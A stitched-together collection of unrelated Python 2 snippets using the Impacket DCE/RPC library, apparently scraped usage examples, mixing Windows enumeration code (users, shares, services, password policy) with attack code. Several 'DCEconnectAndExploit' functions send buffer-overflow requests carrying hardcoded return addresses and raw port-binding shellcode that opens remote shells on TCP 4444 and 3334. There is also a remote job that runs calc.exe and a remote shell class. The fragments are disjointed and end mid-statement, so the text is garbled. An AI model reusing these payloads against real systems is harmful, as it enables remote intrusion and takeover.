def __bruteForce(self, rpctransport, maxRid):
# UDP only works over DCE/RPC version 4.
if isinstance(rpctransport, transport.UDPTransport):
dce = dcerpc_v4.DCERPC_v4(rpctransport)
else:
dce = dcerpc.DCERPC_v5(rpctransport)
entries = []
dce.connect()
# Want encryption? Uncomment next line
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
# Want fragmentation? Uncomment next line
#dce.set_max_fragment_size(32)
dce.bind(lsarpc.MSRPC_UUID_LSARPC)
rpc = lsarpc.DCERPCLsarpc(dce)
resp = rpc.LsarOpenPolicy2(rpctransport.get_dip(),
access_mask=0x02000000)
try:
resp2 = rpc.LsarQueryInformationPolicy2(
resp['ContextHandle'],
lsarpc.POLICY_ACCOUNT_DOMAIN_INFORMATION)
rootsid = resp2.formatDict()['sid'].formatCanonical()
except Exception, e:
print e
def main(args):
if len(args) != 4:
print "usage: opdump.py hostname port interface version"
return 1
host, port, interface, version = args[0], int(args[1]), args[2], args[3]
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
results = []
for i in range(256):
dce = dcerpc.DCERPC_v5(trans)
dce.connect()
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
dce.call(i, "")
try:
resp = dce.recv()
except dcerpc.Exception, e:
result = str(e)
else:
result = "success"
dce.disconnect()
results.append(result)
def doStuff(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
dce.connect()
dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
#dce.set_max_fragment_size(16)
dce.bind(printer.MSRPC_UUID_SPOOLSS)
rpcspool = printer.PrintSpooler(dce)
resp = rpcspool.enumPrinters('\x00', 0x2, level=1)
data = resp['PrinterEnum']
index = 0
for i in range(resp['cReturned']):
# skip the flags
flags = unpack('<L', data[index:index + 4])[0]
index += 4
description = unpack('<L', data[index:index + 4])[0]
index += 4
name = unpack('<L', data[index:index + 4])[0]
index += 4
comment = unpack('<L', data[index:index + 4])[0]
index += 4
# Yes.. still don't know why.. offsets are 0x10*i away from the actual data
description = data[(description + 16 * i):].split('\x00\x00')[0]
name = data[(name + 16 * i):].split('\x00\x00')[0]
comment = data[(comment + 16 * i):].split('\x00\x00')[0]
print "flags: 0x%x\nname:[%s]\ndescription:[%s]\ncomment:[%s]\n" % (
flags, name, description, comment)
#resp = rpcspool.enumPorts()
#resp.dump()
dce.disconnect()
def __fetchList(self, rpctransport):
# UDP only works over DCE/RPC version 4.
if isinstance(rpctransport, transport.UDPTransport):
dce = dcerpc_v4.DCERPC_v4(rpctransport)
else:
dce = dcerpc.DCERPC_v5(rpctransport)
entries = []
dce.connect()
dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(epm.MSRPC_UUID_PORTMAP)
rpcepm = epm.DCERPCEpm(dce)
resp = rpcepm.portmap_dump()
while resp.get_entries_num() != 0:
rpc_handle = resp.get_handle()
ndrentry = resp.get_entry().get_entry()
sb = transport.DCERPCStringBinding(ndrentry.get_string_binding())
entry = epm.EpmEntry(uuid.bin_to_string(ndrentry.get_uuid()),
ndrentry.get_version(),
ndrentry.get_annotation(),
uuid.bin_to_string(ndrentry.get_objuuid()),
sb.get_protocol_sequence(), sb.get_endpoint())
entries.append(entry)
## print str(entry)
resp = rpcepm.portmap_dump(rpc_handle)
dce.disconnect()
return entries
def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(
uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0')))
dce.call(0x01, stub)
def doStuff(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
try:
dce.connect()
except Exception, e:
print e
sys.exit(1)
def main(args):
if len(args) != 2:
print "usage: ./ifmap.py <host> <port>"
return 1
host = args[0]
port = int(args[1])
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
dce = dcerpc.DCERPC_v5(trans)
dce.connect()
iid = uuid.uuidtup_to_bin(("afa8bd80-7d8a-11c9-bef4-08002b102989", "1.0"))
dce.bind(iid)
dcemgmt = mgmt.DCERPCMgmt(dce)
ifids = dcemgmt.inq_if_ids()
uuidtups = set(
uuid.bin_to_uuidtup(ifids.get_if_binuuid(index))
for index in range(ifids.get_ifcount()))
dce.disconnect()
probes = uuidtups | uuid_database
for tup in sorted(probes):
listed = tup in uuidtups
dce.connect()
binuuid = uuid.uuidtup_to_bin(tup)
try:
dce.bind(binuuid)
except dcerpc.Exception, e:
resp = dcerpc.MSRPCBindAck(str(e.args[1]))
if (resp.getCtxItem(1)['Result'],
resp.getCtxItem(1)['Reason']) == (2, 1):
listening = False
else:
raise
else:
listening = True
listed = tup in uuidtups
otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
if listed or listening:
print "%r: %s, %s" % (
tup, "listed" if listed else
"other version listed" if otherversion else "not listed",
"listening" if listening else "not listening")
def __fetchList(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
encoding = sys.getdefaultencoding()
entries = []
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
rpcsamr = samr.DCERPCSamr(dce)
try:
resp = rpcsamr.connect()
if resp.get_return_code() != 0:
raise ListUsersException, 'Connect error'
_context_handle = resp.get_context_handle()
resp = rpcsamr.enumdomains(_context_handle)
if resp.get_return_code() != 0:
raise ListUsersException, 'EnumDomain error'
domains = resp.get_domains().elements()
print 'Found domain(s):'
for i in range(0, resp.get_entries_num()):
print " . %s" % domains[i].get_name()
print "Looking up users in domain %s" % domains[0].get_name()
resp = rpcsamr.lookupdomain(_context_handle, domains[0])
if resp.get_return_code() != 0:
raise ListUsersException, 'LookupDomain error'
resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid())
if resp.get_return_code() != 0:
raise ListUsersException, 'OpenDomain error'
domain_context_handle = resp.get_context_handle()
resp = rpcsamr.enumusers(domain_context_handle)
if resp.get_return_code() != 0:
raise ListUsersException, 'OpenDomainUsers error'
for user in resp.get_users().elements():
uname = user.get_name().encode(encoding, 'replace')
uid = user.get_id()
r = rpcsamr.openuser(domain_context_handle, uid)
print "Found user: %s, uid = %d" % (uname, uid)
if r.get_return_code() == 0:
info = rpcsamr.queryuserinfo(r.get_context_handle()).get_user_info()
entry = (uname, uid, info)
entries.append(entry)
c = rpcsamr.closerequest(r.get_context_handle())
except ListUsersException, e:
print "Error listing users: %s" % e
def do_shares(self, line):
rpctransport = transport.SMBTransport(self.smb.get_remote_name(),
self.smb.get_remote_host(),
filename=r'\srvsvc',
smb_server=self.smb)
dce = dcerpc.DCERPC_v5(rpctransport)
dce.connect()
dce.bind(srvsvc.MSRPC_UUID_SRVSVC)
srv_svc = srvsvc.DCERPCSrvSvc(dce)
resp = srv_svc.get_share_enum_1(rpctransport.get_dip())
for i in range(len(resp)):
print resp[i]['NetName'].decode('utf-16')
def dce_connect_and_exploit(target):
trans = transport.TCPTransport(target, 6504)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0')))
print "Building packet ..."
request = build_stub_packet(ip)
print "Sending packet ..."
dce.call(342, request)
def doStuff(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
user, pwd, domain, _, _ = rpctransport.get_credentials()
dce.set_credentials(user,pwd,domain)
dce.connect()
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
#dce.set_max_fragment_size(16)
dce.bind(atsvc.MSRPC_UUID_ATSVC)
at = atsvc.DCERPCAtSvc(dce)
# Check [MS-TSCH] Section 2.3.4
atInfo = atsvc.AT_INFO()
atInfo['JobTime'] = 0
atInfo['DaysOfMonth'] = 0
atInfo['DaysOfWeek'] = 0
atInfo['Flags'] = 0
atInfo['Command'] = ndrutils.NDRUniqueStringW()
atInfo['Command']['Data'] = ('calc.exe\x00').encode('utf-16le')
# Remember to remove it on the target server ;)
resp = at.NetrJobAdd(('\\\\%s'% rpctransport.get_dip()),atInfo)
resp = at.NetrJobEnum(rpctransport.get_dip())
# ToDo: Parse this struct, should be easy
resp.dump()
# Switching context to TSS
dce = dce.alter_ctx(atsvc.MSRPC_UUID_TSS)
# Now atsvc should use that new context
at = atsvc.DCERPCAtSvc(dce)
#path = '\\Microsoft\\Windows\\Media Center'
path = '\\'
resp = at.SchRpcEnumTasks(path)
if resp['Count'] == 1:
print resp['TaskName']['Data']
if resp['ErrorCode'] == atsvc.S_FALSE:
i = 1
done = False
while done is not True:
# More items
try:
resp = at.SchRpcEnumTasks(path,startIndex=i)
except:
break
if resp['Count'] == 1:
print resp['TaskName']['Data']
i += 1
elif resp['ErrorCode'] != atsvc.S_FALSE:
done = True
dce.disconnect()
def listShares(self):
# Get the shares through RPC
from impacket.dcerpc import transport, dcerpc, srvsvc
rpctransport = transport.SMBTransport(self.getRemoteHost(),
self.getRemoteHost(),
filename=r'\srvsvc',
smb_connection=self)
dce = dcerpc.DCERPC_v5(rpctransport)
dce.connect()
dce.bind(srvsvc.MSRPC_UUID_SRVSVC)
srv_svc = srvsvc.DCERPCSrvSvc(dce)
resp = srv_svc.get_share_enum_1(rpctransport.get_dip())
return resp
def getShares(self):
# Setup up a DCE SMBTransport with the connection already in place
print "[*] Requesting shares on %s....." % (self.client.get_remote_host())
try:
self._rpctransport = transport.SMBTransport('','',filename = r'\srvsvc', smb_server = self.client)
self._dce = dcerpc.DCERPC_v5(self._rpctransport)
self._dce.connect()
self._dce.bind(srvsvc.MSRPC_UUID_SRVSVC)
srv_svc = srvsvc.DCERPCSrvSvc(self._dce)
resp = srv_svc.get_share_enum_1(self._rpctransport.get_dip())
return resp
except:
print "[!] Error requesting shares on %s, aborting....." % (self.client.get_remote_host())
raise
def openSvcManager(self):
print "[*] Opening SVCManager on %s....." % self.client.get_remote_host()
# Setup up a DCE SMBTransport with the connection already in place
self._rpctransport = transport.SMBTransport('','',filename = r'\svcctl', smb_server = self.client)
self._dce = dcerpc.DCERPC_v5(self._rpctransport)
self._dce.connect()
self._dce.bind(svcctl.MSRPC_UUID_SVCCTL)
self.rpcsvc = svcctl.DCERPCSvcCtl(self._dce)
try:
resp = self.rpcsvc.OpenSCManagerW()
except:
print "[!] Error opening SVCManager on %s....." % self.client.get_remote_host()
return 0
else:
return resp['ContextHandle']
def do_info(self, line):
rpctransport = transport.SMBTransport(self.smb.get_remote_name(),
self.smb.get_remote_host(),
filename=r'\srvsvc',
smb_server=self.smb)
dce = dcerpc.DCERPC_v5(rpctransport)
dce.connect()
dce.bind(srvsvc.MSRPC_UUID_SRVSVC)
srv_svc = srvsvc.DCERPCSrvSvc(dce)
resp = srv_svc.get_server_info_102(rpctransport.get_dip())
print "Version Major: %d" % resp['VersionMajor']
print "Version Minor: %d" % resp['VersionMinor']
print "Server Name: %s" % resp['Name']
print "Server Comment: %s" % resp['Comment']
print "Server UserPath: %s" % resp['UserPath']
print "Simultaneous Users: %d" % resp['Users']
def __init__(self, share, rpc, mode):
cmd.Cmd.__init__(self)
self.__share = share
self.__mode = mode
self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
self.__outputBuffer = ''
self.__command = ''
self.__shell = '%COMSPEC% /Q /c '
self.__serviceName = 'BTOBTO'.encode('utf-16le')
self.intro = '[!] Launching semi-interactive shell - Careful what you execute'
dce = dcerpc.DCERPC_v5(rpc)
try:
dce.connect()
except Exception, e:
pass
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(
uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
# The following DWORD gets converted to an address pointing into our
# buffer.
request = struct.pack('<L', 0x00003A7C)
request += "A" * 19608
request += "\x90\x90\xeb\x06"
# At the point of overflow EBX points to our shellcode
# Address of 'call ebx' from kernel32.dll SP4
request += struct.pack('<L', 0x7C577B03)
request += "\x90\x90\x90\x90"
request += shellcode
request += "b" * 480000
dce.call(45, request)
def openSvcManager(self):
"""Connect to the SVCManager on the remote host."""
print("[*] Opening SVCManager on %s...."
"." % self.connection.getRemoteHost())
# Setup up a DCE SMBTransport with the connection already in place
self._rpctransport = transport.SMBTransport(
'', '', filename=r'\svcctl', smb_connection=self.connection)
self._dce = dcerpc.DCERPC_v5(self._rpctransport)
self._dce.connect()
self._dce.bind(svcctl.MSRPC_UUID_SVCCTL)
self.rpcsvc = svcctl.DCERPCSvcCtl(self._dce)
try:
resp = self.rpcsvc.OpenSCManagerW()
except Exception:
print("[!] Error opening SVCManager on %s...."
"." % self.connection.getRemoteHost())
raise Exception('Unable to open SVCManager')
else:
return resp['ContextHandle']
def getShares(self):
"""Return a list of shares on the remote windows server."""
# Setup up a DCE SMBTransport with the connection already in place
print("[*] Requesting shares on %s....." %
(self.connection.getRemoteHost()))
try:
self._rpctransport = transport.SMBTransport(
'', '', filename=r'\srvsvc', smb_connection=self.connection)
self._dce = dcerpc.DCERPC_v5(self._rpctransport)
self._dce.connect()
self._dce.bind(srvsvc.MSRPC_UUID_SRVSVC)
srv_svc = srvsvc.DCERPCSrvSvc(self._dce)
resp = srv_svc.get_share_enum_1(self._rpctransport.get_dip())
return resp
except Exception:
print("[!] Error requesting shares on %s, aborting....." %
(self.connection.getRemoteHost()))
raise
def __fetchList(self, rpctransport):
# UDP only works over DCE/RPC version 4.
if isinstance(rpctransport, transport.UDPTransport):
dce = dcerpc_v4.DCERPC_v4(rpctransport)
else:
dce = dcerpc.DCERPC_v5(rpctransport)
entries = []
dce.connect()
dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(epm.MSRPC_UUID_PORTMAP)
rpcepm = epm.DCERPCEpm(dce)
resp = rpcepm.lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
dce.disconnect()
return resp
def __fetchData(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
encoding = sys.getdefaultencoding()
entries = []
dce.connect()
dce.bind(wkssvc.MSRPC_UUID_WKSSVC)
wkssvc_dce = wkssvc.DCERPCWksSvc(dce)
try:
print 'Retrieving mac address for %s' % rpctransport.get_dip()
resp = wkssvc_dce.NetrWkstaTransportEnum(rpctransport.get_dip())
for i in range(resp['Count']):
print 'TransportName: %s' % resp['Array'][i]['TransportName'][
'Data'].decode('utf-16le')
print 'TransportAddress: %s' % resp['Array'][i][
'TransportAddress']['Data'].decode('utf-16le')
except WKSSVCException, e:
print "Error: %s" % e
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(
uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0')))
pm = epm.DCERPCEpm(dce)
handle = '\x00' * 20
while 1:
dump = pm.portmap_dump(handle)
if not dump.get_entries_num():
break
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if (uuid.bin_to_string(
entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)
print '[-] Could not locate DNS port; Target might not be running DNS'
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(
uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
request = "A" * 676
request += "\x90\x90\x90\x90"
request += "\x90\x90\xeb\x0a"
#Call dword ptr [esi +4C] from user32.dll
request += struct.pack("<L", 0x77E4FB7A)
#Overwrite UnhandledExceptionFilter in Windows 2000 SP0
request += struct.pack("<L", 0x77EE044C)
request += "\x90\x90\x90\x90" * 2
#Portbinding shellcode; Opens shell on TCP port 4444
request += "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
request += "\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
request += "\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
request += "\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
request += "\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
request += "\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
request += "\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
request += "\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
request += "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
request += "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
request += "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
request += "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
request += "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
request += "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
request += "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
request += "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
request += "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
request += "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
request += "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
request += "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
request += "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
request += "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"
dce.call(43, request)
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6502)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(
uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837', '1.0')))
request = '\x10\x09\xf9\x77'
request += '\x41' * 1130
request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops
request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll
request += '\x90' * 32
#Shellcode to bind shell to TCP port 3334
request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
request += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
request += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
request += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
request += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
dce.call(38, request)
def __fetchList(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
#dce.set_auth_level(2)
encoding = sys.getdefaultencoding()
entries = []
try:
dce.connect()
#sys.exit()
dce.bind(samr.MSRPC_UUID_SAMR)
#sys.exit()
rpcsamr = samr.DCERPCSamr(dce)
resp = rpcsamr.connect()
if resp.get_return_code() != 0:
raise ListUsersException, 'Connect error'
_context_handle = resp.get_context_handle()
resp = rpcsamr.enumdomains(_context_handle)
if resp.get_return_code() != 0:
raise ListUsersException, 'EnumDomain error'
domains = resp.get_domains().elements()
print '\n[+] Found domain(s):\n'
for i in range(0, resp.get_entries_num()):
print "\t[+] %s" % domains[i].get_name()
print "\n[+] Password Info for Domain: %s" % domains[0].get_name()
resp = rpcsamr.lookupdomain(_context_handle, domains[0])
if resp.get_return_code() != 0:
raise ListUsersException, 'LookupDomain error'
resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid())
if resp.get_return_code() != 0:
raise ListUsersException, 'OpenDomain error'
domain_context_handle = resp.get_context_handle()
resp = rpcsamr.enumPass(domain_context_handle)
resp.print_friendly()
except ListUsersException, e:
print "Error Getting Password Policy: %s" % e
dce.disconnect()
def EnableDetailLogging(target):
trans = transport.TCPTransport(target, 6502)
#On some linux systems the following call to connect may fail due to
#no support of settimeout in socket module. Comment out that line in
#transport.py of impacket and run this script
try:
trans.connect()
except:
print 'Could not connect to target port; Target may not be running tapeeng'
sys.exit(-1)
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
#RPC request to enable detail logging
request = '\x00\x04\x08\x0c'
request += '\x02\x00\x00\x00'
request += '\x00\x00\x00\x00'
request += '\x00\x00\x00\x00'
request += '\x00\x00\x00\x00'
dce.call(43, request)
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
def doStuff(self, rpctransport):
# UDP only works over DCE/RPC version 4.
if isinstance(rpctransport, transport.UDPTransport):
dce = dcerpc_v4.DCERPC_v4(rpctransport)
else:
dce = dcerpc.DCERPC_v5(rpctransport)
#dce.set_credentials(self.__username, self.__password)
dce.connect()
#dce.set_max_fragment_size(1)
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_INTEGRITY)
dce.bind(svcctl.MSRPC_UUID_SVCCTL)
rpc = svcctl.DCERPCSvcCtl(dce)
ans = rpc.OpenSCManagerW()
scManagerHandle = ans['ContextHandle']
ans = rpc.OpenServiceW(scManagerHandle,
self.__service_name.encode('utf-16le'))
serviceHandle = ans['ContextHandle']
if self.__action.upper() == 'START':
print "Starting service %s" % self.__service_name
rpc.StartServiceW(serviceHandle)
rpc.CloseServiceHandle(serviceHandle)
elif self.__action.upper() == 'STOP':
print "Stopping service %s" % self.__service_name
rpc.StopService(serviceHandle)
rpc.CloseServiceHandle(serviceHandle)
elif self.__action.upper() == 'DELETE':
print "Deleting service %s" % self.__service_name
rpc.DeleteService(serviceHandle)
rpc.CloseServiceHandle(serviceHandle)
elif self.__action.upper() == 'CONFIG':
print "Querying service config for %s" % self.__service_name
resp = rpc.QueryServiceConfigW(serviceHandle)
print "TYPE : %2d - " % resp['QueryConfig'][
'ServiceType'],
if resp['QueryConfig']['ServiceType'] == 0x1:
print "SERVICE_KERNLE_DRIVER"
elif resp['QueryConfig']['ServiceType'] == 0x2:
print "SERVICE_FILE_SYSTEM_DRIVER"
elif resp['QueryConfig']['ServiceType'] == 0x10:
print "SERVICE_WIN32_OWN_PROCESS"
elif resp['QueryConfig']['ServiceType'] == 0x20:
print "SERVICE_WIN32_SHARE_PROCESS"
else:
print "UNKOWN"
print "START_TYPE : %2d - " % resp['QueryConfig'][
'StartType'],
if resp['QueryConfig']['StartType'] == 0x0:
print "BOOT START"
elif resp['QueryConfig']['StartType'] == 0x1:
print "SYSTEM START"
elif resp['QueryConfig']['StartType'] == 0x2:
print "AUTO START"
elif resp['QueryConfig']['StartType'] == 0x3:
print "DEMAND START"
elif resp['QueryConfig']['StartType'] == 0x4:
print "DISABLED"
else:
print "UNKOWN"
print "ERROR_CONTROL : %2d - " % resp['QueryConfig'][
'ErrorControl'],
if resp['QueryConfig']['ErrorControl'] == 0x0:
print "IGNORE"
elif resp['QueryConfig']['ErrorControl'] == 0x1:
print "NORMAL"
elif resp['QueryConfig']['ErrorControl'] == 0x2:
print "SEVERE"
elif resp['QueryConfig']['ErrorControl'] == 0x3:
print "CRITICAL"
else:
print "UNKOWN"
print "BINARY_PATH_NAME : %s" % resp['QueryConfig'][
'BinaryPathName'].decode('utf-16le')
print "LOAD_ORDER_GROUP : %s" % resp['QueryConfig'][
'LoadOrderGroup'].decode('utf-16le')
print "TAG : %d" % resp['QueryConfig']['TagID']
print "DISPLAY_NAME : %s" % resp['QueryConfig'][
'DisplayName'].decode('utf-16le')
print "DEPENDENCIES : %s" % resp['QueryConfig'][
'Dependencies'].decode('utf-16le').replace('/', ' - ')
print "SERVICE_START_NAME: %s" % resp['QueryConfig'][
'ServiceStartName'].decode('utf-16le')
elif self.__action.upper() == 'STATUS':
print "Querying status for %s" % self.__service_name
resp = rpc.QueryServiceStatus(serviceHandle)
print "%30s - " % (self.__service_name),
state = resp['CurrentState']
if state == svcctl.SERVICE_CONTINUE_PENDING:
print "CONTINUE PENDING"
elif state == svcctl.SERVICE_PAUSE_PENDING:
print "PAUSE PENDING"
elif state == svcctl.SERVICE_PAUSED:
print "PAUSED"
elif state == svcctl.SERVICE_RUNNING:
print "RUNNING"
elif state == svcctl.SERVICE_START_PENDING:
print "START PENDING"
elif state == svcctl.SERVICE_STOP_PENDING:
print "STOP PENDING"
elif state == svcctl.SERVICE_STOPPED:
print "STOPPED"
else:
print "UNKOWN"
elif self.__action.upper() == 'LIST':
print "Listing services available on target"
#resp = rpc.EnumServicesStatusW(scManagerHandle, svcctl.SERVICE_WIN32_SHARE_PROCESS )
#resp = rpc.EnumServicesStatusW(scManagerHandle, svcctl.SERVICE_WIN32_OWN_PROCESS )
#resp = rpc.EnumServicesStatusW(scManagerHandle, serviceType = svcctl.SERVICE_FILE_SYSTEM_DRIVER, serviceState = svcctl.SERVICE_STATE_ALL )
resp = rpc.EnumServicesStatusW(scManagerHandle)
for i in range(len(resp)):
print "%30s - %70s - " % (resp[i]['ServiceName'].decode(
'utf-16'), resp[i]['DisplayName'].decode('utf-16')),
state = resp[i]['CurrentState']
if state == svcctl.SERVICE_CONTINUE_PENDING:
print "CONTINUE PENDING"
elif state == svcctl.SERVICE_PAUSE_PENDING:
print "PAUSE PENDING"
elif state == svcctl.SERVICE_PAUSED:
print "PAUSED"
elif state == svcctl.SERVICE_RUNNING:
print "RUNNING"
elif state == svcctl.SERVICE_START_PENDING:
print "START PENDING"
elif state == svcctl.SERVICE_STOP_PENDING:
print "STOP PENDING"
elif state == svcctl.SERVICE_STOPPED:
print "STOPPED"
else:
print "UNKOWN"
print "Total Services: %d" % len(resp)
else:
print "Unknown action %s" % self.__action
rpc.CloseServiceHandle(scManagerHandle)
dce.disconnect()
return
def get_dce_rpc(self):
if isinstance(self, UDPTransport):
return dcerpc_v4.DCERPC_v4(self)
else:
return dcerpc.DCERPC_v5(self)
def doStuff(self, rpctransport):
"""."""
dce = dcerpc.DCERPC_v5(rpctransport)
try:
dce.connect()
except Exception as e:
print(e)
sys.exit(1)
global dialect
dialect = rpctransport.get_smb_connection().getDialect()
try:
unInstalled = False
s = rpctransport.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
svcName = "RackspaceSystemDiscovery"
executableName = "RackspaceSystemDiscovery.exe"
if self.__exeFile is None:
svc = remcomsvc.RemComSvc()
installService = serviceinstall.ServiceInstall(s, svc,
svcName,
executableName)
else:
try:
